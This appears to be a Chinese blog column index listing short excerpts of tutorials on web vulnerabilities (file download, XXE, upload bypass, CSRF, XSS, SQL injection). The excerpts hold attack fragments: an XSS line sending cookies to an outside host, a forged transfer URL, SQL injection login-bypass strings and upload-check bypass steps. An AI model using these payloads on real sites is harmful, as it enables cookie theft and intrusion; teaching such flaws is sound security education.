
web漏洞介绍
文章平均质量分 91
web漏洞介绍
星落.
不追热点、不关时政、做自己喜欢的事。
展开
-
任意文件下载(读取)
漏洞简介:一些网站由于业务需求,往往需要提供文件查看或下载功能。一般来说在文件下载或查看功能处,当文件名参数可控,且系统未对参数进行严格过滤或者过滤不严格时,就能够实现下载服务器上的任何文件,产生任意文件下载漏洞,黑客可以利用( ../ )跳出程序本身的限制目录实现下载任意文件。...原创 2022-08-29 10:57:47 · 4819 阅读 · 0 评论 -
XXE漏洞介绍及利用
XXE漏洞介绍XXE全称为XML External Entity Injection即XMl外部实体注入漏洞。XXE漏洞XXE漏洞触发点往往是可以上传xmlwenjian的位置,没有对xml文件进行过滤,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害XML介绍及用途XMl被设计用来传输和存储数据。XML文档形成了一种树状结构,它从"根部"开始,然后扩展到"枝叶"。XMl允许作者定义自己的标签和自己的文档结构。XML.原创 2020-06-11 16:54:25 · 10340 阅读 · 0 评论 -
文件上传漏洞利用介绍
绕过js验证js验证代码分析burpsuit剔除js验证对于js前端验证,直接删除js代码之后就可以绕过js验证绕过MIME-TYPE验证验证MEMI-TYPE代码分析查看源代码分析,使用$_FILE["upload_file"]["type"]获取上传文件的MIME-TYPE类型。其中upload_file是在表单中定义的。burpsuit绕过MIME-TYPE验证利用burpsuit工具截断http请求,在repeater重放修改MIME-TYPE类型绕过验证原创 2020-06-05 16:56:58 · 11283 阅读 · 0 评论 -
CSRF漏洞利用介绍
CSRF漏洞介绍CSRF:跨站请求伪造,也称为One Click Attack 缩写为CSRFCSRF漏洞代码分析<?php//会话验证$user =$_GET["user"];$money=$_GET["monkey"];//转账操作?>http://1270.0.1/pay.php?user=heike&monkey=10000我们把这个链接发给受害人,受害人点击后,就会把受害人的钱发给我们。CSRF自动化探测...原创 2020-06-02 18:35:22 · 14510 阅读 · 0 评论 -
XSS漏洞介绍及绕过技术
跨站脚本攻击(Cross Site Scriptong),为了不和层叠样式表(Cascading Style Sheels)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面插入恶意Script代码,当用户浏览该页时,嵌入期中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。反射型XSS存储型XSS DOM型XSSxss盗取cookie代码<script>document.location=http://ip/cookie.php?coo..原创 2020-05-30 13:22:31 · 15055 阅读 · 0 评论 -
SQL注入原理及绕过技术
sql注入产生的原因程序开发过程中,由于不重视书写规范,对sql关键字未进行过滤,导致客户端可以通过POST或GET提交sql语句到服务器端正常运行万能密码介绍select * from tables where username = ' ' and password = ' '' and '1' ='1' or '1' = '1sql注入验证单引号 ' and 1 = 1 and 1 = 2如果页面中mysql报错,证明该页面存在sql 注入漏洞mysql 5....原创 2020-05-29 07:19:51 · 15151 阅读 · 0 评论